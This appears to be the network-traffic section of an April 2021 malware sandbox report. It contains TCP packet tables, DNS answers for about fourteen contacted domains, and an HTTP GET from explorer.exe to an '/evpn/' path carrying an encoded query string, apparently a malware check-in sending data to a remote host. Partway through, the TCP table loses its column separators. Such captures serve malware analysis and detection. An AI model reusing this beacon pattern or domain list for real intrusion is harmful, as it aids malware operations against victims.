                                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                        Apr 8, 2021 11:10:00.217864037 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.365052938 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:00.365211964 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.365288973 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.554486990 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:00.582693100 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:00.582726002 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:00.582911015 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.582946062 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:00.583053112 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.583158970 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.650544882 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:00.650693893 CEST | 49724 | 80 | 192.168.2.3 | 208.91.197.91
                                                                        Apr 8, 2021 11:10:00.730070114 CEST | 80 | 49724 | 208.91.197.91 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:05.925271034 CEST | 49727 | 80 | 192.168.2.3 | 23.227.38.74
                                                                        Apr 8, 2021 11:10:05.937638044 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:05.937922001 CEST | 49727 | 80 | 192.168.2.3 | 23.227.38.74
                                                                        Apr 8, 2021 11:10:05.937941074 CEST | 49727 | 80 | 192.168.2.3 | 23.227.38.74
                                                                        Apr 8, 2021 11:10:05.952662945 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077676058 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077707052 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077727079 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077747107 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077764034 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077776909 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077792883 CEST | 80 | 49727 | 23.227.38.74 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:06.077883959 CEST | 49727 | 80 | 192.168.2.3 | 23.227.38.74
                                                                        Apr 8, 2021 11:10:06.077912092 CEST | 49727 | 80 | 192.168.2.3 | 23.227.38.74
                                                                        Apr 8, 2021 11:10:06.077938080 CEST | 49727 | 80 | 192.168.2.3 | 23.227.38.74
                                                                        Apr 8, 2021 11:10:11.203042984 CEST | 49728 | 80 | 192.168.2.3 | 45.82.188.40
                                                                        Apr 8, 2021 11:10:11.230284929 CEST | 80 | 49728 | 45.82.188.40 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:11.230503082 CEST | 49728 | 80 | 192.168.2.3 | 45.82.188.40
                                                                        Apr 8, 2021 11:10:11.923106909 CEST | 49728 | 80 | 192.168.2.3 | 45.82.188.40
                                                                        Apr 8, 2021 11:10:11.952112913 CEST | 80 | 49728 | 45.82.188.40 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:11.952156067 CEST | 80 | 49728 | 45.82.188.40 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:11.952167988 CEST | 80 | 49728 | 45.82.188.40 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:11.952289104 CEST | 49728 | 80 | 192.168.2.3 | 45.82.188.40
                                                                        Apr 8, 2021 11:10:11.952354908 CEST | 49728 | 80 | 192.168.2.3 | 45.82.188.40
                                                                        Apr 8, 2021 11:10:11.980856895 CEST | 80 | 49728 | 45.82.188.40 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:17.030925989 CEST | 49729 | 80 | 192.168.2.3 | 35.240.239.44
                                                                        Apr 8, 2021 11:10:17.300138950 CEST | 80 | 49729 | 35.240.239.44 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:17.300318003 CEST | 49729 | 80 | 192.168.2.3 | 35.240.239.44
                                                                        Apr 8, 2021 11:10:17.300426006 CEST | 49729 | 80 | 192.168.2.3 | 35.240.239.44
                                                                        Apr 8, 2021 11:10:17.568850040 CEST | 80 | 49729 | 35.240.239.44 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:17.568883896 CEST | 80 | 49729 | 35.240.239.44 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:17.568898916 CEST | 80 | 49729 | 35.240.239.44 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:17.569163084 CEST | 49729 | 80 | 192.168.2.3 | 35.240.239.44
                                                                        Apr 8, 2021 11:10:17.570935011 CEST | 49729 | 80 | 192.168.2.3 | 35.240.239.44
                                                                        Apr 8, 2021 11:10:17.839649916 CEST | 80 | 49729 | 35.240.239.44 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:22.709868908 CEST | 49731 | 80 | 192.168.2.3 | 52.15.160.167
                                                                        Apr 8, 2021 11:10:22.820398092 CEST | 80 | 49731 | 52.15.160.167 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:22.820521116 CEST | 49731 | 80 | 192.168.2.3 | 52.15.160.167
                                                                        Apr 8, 2021 11:10:22.820638895 CEST | 49731 | 80 | 192.168.2.3 | 52.15.160.167
                                                                        Apr 8, 2021 11:10:22.931169987 CEST | 80 | 49731 | 52.15.160.167 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:22.931658030 CEST | 80 | 49731 | 52.15.160.167 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:22.931688070 CEST | 80 | 49731 | 52.15.160.167 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:22.931835890 CEST | 49731 | 80 | 192.168.2.3 | 52.15.160.167
                                                                        Apr 8, 2021 11:10:22.931879997 CEST | 49731 | 80 | 192.168.2.3 | 52.15.160.167
                                                                        Apr 8, 2021 11:10:23.042037010 CEST | 80 | 49731 | 52.15.160.167 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:28.053559065 CEST | 49737 | 80 | 192.168.2.3 | 52.216.152.43
                                                                        Apr 8, 2021 11:10:28.154652119 CEST | 80 | 49737 | 52.216.152.43 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:28.155349970 CEST | 49737 | 80 | 192.168.2.3 | 52.216.152.43
                                                                        Apr 8, 2021 11:10:28.155589104 CEST | 49737 | 80 | 192.168.2.3 | 52.216.152.43
                                                                        Apr 8, 2021 11:10:28.256407022 CEST | 80 | 49737 | 52.216.152.43 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:28.264857054 CEST | 80 | 49737 | 52.216.152.43 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:28.264894009 CEST | 80 | 49737 | 52.216.152.43 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:28.265091896 CEST | 49737 | 80 | 192.168.2.3 | 52.216.152.43
                                                                        Apr 8, 2021 11:10:28.265119076 CEST | 49737 | 80 | 192.168.2.3 | 52.216.152.43
                                                                        Apr 8, 2021 11:10:28.294995070 CEST | 80 | 49737 | 52.216.152.43 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:28.295182943 CEST | 49737 | 80 | 192.168.2.3 | 52.216.152.43
                                                                        Apr 8, 2021 11:10:28.365971088 CEST | 80 | 49737 | 52.216.152.43 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.378814936 CEST | 49738 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 11:10:38.489213943 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.489316940 CEST | 49738 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 11:10:38.489486933 CEST | 49738 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 11:10:38.598885059 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605370045 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605474949 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605514050 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605544090 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605580091 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605597019 CEST | 49738 | 80 | 192.168.2.3 | 198.185.159.144
                                                                        Apr 8, 2021 11:10:38.605628014 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605669975 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605706930 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605743885 CEST | 80 | 49738 | 198.185.159.144 | 192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605781078 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.605846882 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.605946064 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.605999947 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.715487957 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715523005 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715549946 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715572119 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715594053 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715615034 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715636969 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715656996 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715679884 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715704918 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715708017 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.715728045 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715750933 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715810061 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715862036 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.715890884 CEST8049738198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 11:10:38.715936899 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:38.716026068 CEST4973880192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 11:10:48.760410070 CEST4973980192.168.2.380.67.16.8
                                                                        Apr 8, 2021 11:10:48.780461073 CEST804973980.67.16.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.780577898 CEST4973980192.168.2.380.67.16.8
                                                                        Apr 8, 2021 11:10:48.780775070 CEST4973980192.168.2.380.67.16.8
                                                                        Apr 8, 2021 11:10:48.800574064 CEST804973980.67.16.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.808635950 CEST804973980.67.16.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.808665991 CEST804973980.67.16.8192.168.2.3
                                                                        Apr 8, 2021 11:10:48.808815956 CEST4973980192.168.2.380.67.16.8
                                                                        Apr 8, 2021 11:10:48.808902025 CEST4973980192.168.2.380.67.16.8
                                                                        Apr 8, 2021 11:10:48.828499079 CEST804973980.67.16.8192.168.2.3
                                                                        Apr 8, 2021 11:10:53.888796091 CEST4974080192.168.2.3188.93.150.75
                                                                        Apr 8, 2021 11:10:53.912343025 CEST8049740188.93.150.75192.168.2.3
                                                                        Apr 8, 2021 11:10:53.912442923 CEST4974080192.168.2.3188.93.150.75
                                                                        Apr 8, 2021 11:10:53.912617922 CEST4974080192.168.2.3188.93.150.75
                                                                        Apr 8, 2021 11:10:53.936116934 CEST8049740188.93.150.75192.168.2.3
                                                                        Apr 8, 2021 11:10:53.936810970 CEST8049740188.93.150.75192.168.2.3
                                                                        Apr 8, 2021 11:10:53.936829090 CEST8049740188.93.150.75192.168.2.3
                                                                        Apr 8, 2021 11:10:53.936999083 CEST4974080192.168.2.3188.93.150.75
                                                                        Apr 8, 2021 11:10:53.937082052 CEST4974080192.168.2.3188.93.150.75
                                                                        Apr 8, 2021 11:10:53.961714983 CEST8049740188.93.150.75192.168.2.3
                                                                        Apr 8, 2021 11:10:59.050141096 CEST4974380192.168.2.345.88.202.115
                                                                        Apr 8, 2021 11:10:59.077600002 CEST804974345.88.202.115192.168.2.3
                                                                        Apr 8, 2021 11:10:59.077740908 CEST4974380192.168.2.345.88.202.115
                                                                        Apr 8, 2021 11:10:59.077899933 CEST4974380192.168.2.345.88.202.115
                                                                        Apr 8, 2021 11:10:59.105072021 CEST804974345.88.202.115192.168.2.3
                                                                        Apr 8, 2021 11:10:59.105108976 CEST804974345.88.202.115192.168.2.3
                                                                        Apr 8, 2021 11:10:59.105137110 CEST804974345.88.202.115192.168.2.3
                                                                        Apr 8, 2021 11:10:59.105285883 CEST4974380192.168.2.345.88.202.115
                                                                        Apr 8, 2021 11:10:59.105355024 CEST4974380192.168.2.345.88.202.115
                                                                        Apr 8, 2021 11:10:59.132777929 CEST804974345.88.202.115192.168.2.3
                                                                        Apr 8, 2021 11:11:04.162039042 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.175038099 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.175199032 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.175527096 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.188569069 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.291693926 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.291786909 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:04.292001963 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.292043924 CEST4974480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:04.304799080 CEST804974434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:09.483736038 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.627065897 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.627285957 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.627645969 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.770426035 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.776088953 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.776129007 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:09.776395082 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.776560068 CEST4974580192.168.2.3192.185.48.194
                                                                        Apr 8, 2021 11:11:09.919728994 CEST8049745192.185.48.194192.168.2.3
                                                                        Apr 8, 2021 11:11:14.827440977 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.839907885 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.840024948 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.840365887 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.852629900 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.966414928 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.966480970 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:14.966608047 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.966674089 CEST4974680192.168.2.334.102.136.180
                                                                        Apr 8, 2021 11:11:14.979166031 CEST804974634.102.136.180192.168.2.3
                                                                        Apr 8, 2021 11:11:20.032197952 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.049751997 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.052408934 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.052567959 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.070154905 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.070189953 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.070207119 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:20.070336103 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.070403099 CEST4974780192.168.2.352.58.78.16
                                                                        Apr 8, 2021 11:11:20.087739944 CEST804974752.58.78.16192.168.2.3
                                                                        Apr 8, 2021 11:11:25.081486940 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.228672981 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.228780985 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.228843927 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.376015902 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415476084 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415529013 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415555954 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.415611029 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.415680885 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.415733099 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.466644049 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:25.466720104 CEST4974880192.168.2.3208.91.197.91
                                                                        Apr 8, 2021 11:11:25.562701941 CEST8049748208.91.197.91192.168.2.3
                                                                        Apr 8, 2021 11:11:30.425491095 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.437556982 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.437642097 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.437684059 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.450519085 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573548079 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573568106 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573580027 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573599100 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573612928 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573626995 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573640108 CEST804974923.227.38.74192.168.2.3
                                                                        Apr 8, 2021 11:11:30.573669910 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.573761940 CEST4974980192.168.2.323.227.38.74
                                                                        Apr 8, 2021 11:11:30.573805094 CEST4974980192.168.2.323.227.38.74

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class

                                                                        DNS Answers

                                                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                        Apr 8, 2021 11:10:00.211360931 CEST | 8.8.8.8 | 192.168.2.3 | 0x82c | No error (0) | www.jamessicilia.com | - | 208.91.197.91 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.924069881 CEST | 8.8.8.8 | 192.168.2.3 | 0xcf2c | No error (0) | www.kinfet.com | shops.myshopify.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:05.924069881 CEST | 8.8.8.8 | 192.168.2.3 | 0xcf2c | No error (0) | shops.myshopify.com | - | 23.227.38.74 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.175832033 CEST | 8.8.8.8 | 192.168.2.3 | 0x693a | No error (0) | www.productsoffholland.com | productsoffholland.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:11.175832033 CEST | 8.8.8.8 | 192.168.2.3 | 0x693a | No error (0) | productsoffholland.com | - | 45.82.188.40 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:17.028974056 CEST | 8.8.8.8 | 192.168.2.3 | 0x70f8 | No error (0) | www.markmalls.com | - | 35.240.239.44 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | www.zhuledao.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 52.15.160.167 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 3.13.255.157 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:22.699301958 CEST | 8.8.8.8 | 192.168.2.3 | 0x4a6b | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | - | 3.14.206.30 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:28.052412033 CEST | 8.8.8.8 | 192.168.2.3 | 0x2af8 | No error (0) | www.jcernadas.com | - | 52.216.152.43 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | www.theholisticbirthco.com | ext-sq.squarespace.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | - | 198.185.159.144 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | - | 198.49.23.145 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | - | 198.49.23.144 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:38.376888037 CEST | 8.8.8.8 | 192.168.2.3 | 0xd7fc | No error (0) | ext-sq.squarespace.com | - | 198.185.159.145 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:43.652030945 CEST | 8.8.8.8 | 192.168.2.3 | 0xf91f | Server failure (2) | www.glgshopbd.com | none | none | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:48.759172916 CEST | 8.8.8.8 | 192.168.2.3 | 0x437a | No error (0) | www.tor-one.com | - | 80.67.16.8 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:53.887645006 CEST | 8.8.8.8 | 192.168.2.3 | 0xa308 | No error (0) | www.de-knutselkeet.com | - | 188.93.150.75 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:10:59.049151897 CEST | 8.8.8.8 | 192.168.2.3 | 0xb165 | No error (0) | www.autotrafficbot.com | - | 45.88.202.115 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.159924030 CEST | 8.8.8.8 | 192.168.2.3 | 0xda3d | No error (0) | www.curiosityisthecurebook.com | curiosityisthecurebook.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:04.159924030 CEST | 8.8.8.8 | 192.168.2.3 | 0xda3d | No error (0) | curiosityisthecurebook.com | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.481863976 CEST | 8.8.8.8 | 192.168.2.3 | 0xb04 | No error (0) | www.usinggroovefunnels.com | usinggroovefunnels.com | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:09.481863976 CEST | 8.8.8.8 | 192.168.2.3 | 0xb04 | No error (0) | usinggroovefunnels.com | - | 192.185.48.194 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.825829983 CEST | 8.8.8.8 | 192.168.2.3 | 0x8358 | No error (0) | www.cgpizza.net | cgpizza.net | - | CNAME (Canonical name) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:14.825829983 CEST | 8.8.8.8 | 192.168.2.3 | 0x8358 | No error (0) | cgpizza.net | - | 34.102.136.180 | A (IP address) | IN (0x0001)
                                                                        Apr 8, 2021 11:11:20.030536890 CEST | 8.8.8.8 | 192.168.2.3 | 0x3223 | No error (0) | www.physicalrobot.com | - | 52.58.78.16 | A (IP address) | IN (0x0001)

                                                                        HTTP Request Dependency Graph

                                                                        • www.jamessicilia.com
                                                                        • www.kinfet.com
                                                                        • www.productsoffholland.com
                                                                        • www.markmalls.com
                                                                        • www.zhuledao.com
                                                                        • www.jcernadas.com
                                                                        • www.theholisticbirthco.com
                                                                        • www.tor-one.com
                                                                        • www.de-knutselkeet.com
                                                                        • www.autotrafficbot.com
                                                                        • www.curiosityisthecurebook.com
                                                                        • www.usinggroovefunnels.com
                                                                        • www.cgpizza.net
                                                                        • www.physicalrobot.com

                                                                        HTTP Packets

                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        0 | 192.168.2.3 | 49724 | 208.91.197.91 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Apr 8, 2021 11:10:00.365288973 CEST | 1369 | OUT | GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1
                                                                        Host: www.jamessicilia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Apr 8, 2021 11:10:00.582693100 CEST | 1370 | IN | HTTP/1.1 200 OK
                                                                        Date: Thu, 08 Apr 2021 09:10:00 GMT
                                                                        Server: Apache
                                                                        Set-Cookie: vsid=926vr3654186005020546; expires=Tue, 07-Apr-2026 09:10:00 GMT; Max-Age=157680000; path=/; domain=www.jamessicilia.com; HttpOnly
                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_Ru1fD82/Yqs+3Zye7dtXUZ/oJiDw2u1OxPgHM8xCyLYyWaTMGCWQidzM+A86L7os7uHpkd6J4BLmsTmMgA8SfQ==
                                                                        Content-Length: 2559
                                                                        Keep-Alive: timeout=5, max=84
                                                                        Connection: Keep-Alive
                                                                        Content-Type: text/html; charset=UTF-8
